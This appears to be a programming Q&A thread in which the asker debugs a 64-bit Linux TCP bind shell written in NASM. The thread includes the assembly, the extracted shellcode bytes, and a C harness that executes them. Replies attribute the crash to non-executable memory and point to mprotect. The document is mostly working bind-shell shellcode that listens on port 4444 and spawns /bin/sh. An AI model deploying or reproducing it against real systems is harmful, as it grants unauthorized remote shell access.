# Segmentation fault when i try to run the extracted shellcode even if there is no null

Tags: c, nasm

I am writing an TCP bind Shell using 64 bit

```
global _start

section .text

_start:

        ;Initializing the registers to make the syscalls
        ; sock = socket(AF_INET, SOCK_STREAM, 0)
        ; AF_INET = 2
        ; SOCK_STREAM = 1
        ; syscall number 41

        xor rax, rax
        xor rdi, rdi
        xor rsi, rsi
        push 0x29
        pop rax
        push 0x2
        pop rdi
        inc rsi
        syscall

        ; copying the socket descripter from rax to rdi register so that we can use it further 
        xchg rax, rdi

        ; server.sin_family = AF_INET 
        ; server.sin_port = htons(PORT)
        ; server.sin_addr.s_addr = INADDR_ANY
        ; bzero(&server.sin_zero, 8)

        ; setting up the data sctructure

        xor rax, rax 

        mov dword [rsp - 4] , eax   ; we are pushing 8 zero's into the eax register
        mov word [rsp - 6] ,0x5c11  ; htons value for(4444) obtained from python then encoded with hex
        mov byte [rsp - 8] , 0x2    ; adding the AF_INET constant value 
        sub rsp , 8                 ; subtracting 8 bytes so that the argument will be aligned in the top of the register

        ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
        ; syscall number 49
        add al, 0x31
        mov rsi, rsp
        add dl, 0x10
        syscall

        ;listen the sockets for the incomming connections    
        ; listen(sock, MAX_CLIENTS)
        ; syscall number 50
        cdq
        push 0x32
        pop rax
        xor rsi, rsi
        add rsi, 0x2
        syscall

        ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
        ;syscall number 43
        xor rax, rax
        add al, 0x2b
        sub rsp, 0x10
        mov rsi, rsp
        push 0x10
        mov rdx, rsp
        syscall

        ; storing the client socket description
        mov r9, rax

        ; close parent
        push 0x3
        pop rax
        syscall

        xchg rdi , r9
        xor rsi , rsi

dup2:
        push 0x21
        pop rax
        syscall
        inc rsi
        cmp rsi , 0x2
        loopne dup2

        ; NASM code for Execve
        xor rax , rax
        mov rdx , rax 
        push rax

        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI
        mov rdi, rsp

        ; Second NULL push
        push rax


        ; Push address of /bin//sh
        push rdi

        ; set RSI
        mov rsi, rsp

        ; Call the Execve syscall
        push 0x3b
        pop rax
        syscall
```

When I try to run the compiled executable its running fine. But if I extract the shell-code and run it with c its throwing segmentation fault core dumped.

> "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x04\x31\x48\x89\xe6\x80\xc2\x10\x0f\x05\x99\x6a\x32\x58\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x04\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x48\x89\xc2\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x6a\x3b\x58\x0f\x05";

Help me figure what's wrong in this

**shellcode.c**

```
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x0f\x05\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x04\x31\x48\x89\xe6\x80\xc2\x10\x0f\x05\x99\x6a\x32\x58\x48\x31\xf6\x48\x83\xc6\x02\x0f\x05\x48\x31\xc0\x04\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";

main()
{

    printf("Shellcode Length:  %d\n", (int)strlen(code));

    int (*ret)() = (int(*)())code;

    ret();

}
```

Comment: "run it with c". How? Did you write a CPU emulator? C doesn't have facilities to run a string.

Comment: yes i compiled it with gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Comment: Show how you run it with C.

Comment: What was in the shellcode.c  file that you compiled ?

Comment: Your operating system is smart enough to not allow you to execute non-executable memory. The flags you passed to gcc are irrelevant since your code is not on the stack.

Comment: ok that means do i need to use stack to entirely code the program

Answer (score 0, accepted):

Okay, this looks like it's on Linux. You have to make your stack executable in order to make it work. You basically have to call mprotect() on your region of memory and set its permissions to PROT_EXEC and PROT_READ.

http://linux.about.com/library/cmd/blcmdl2_mprotect.htm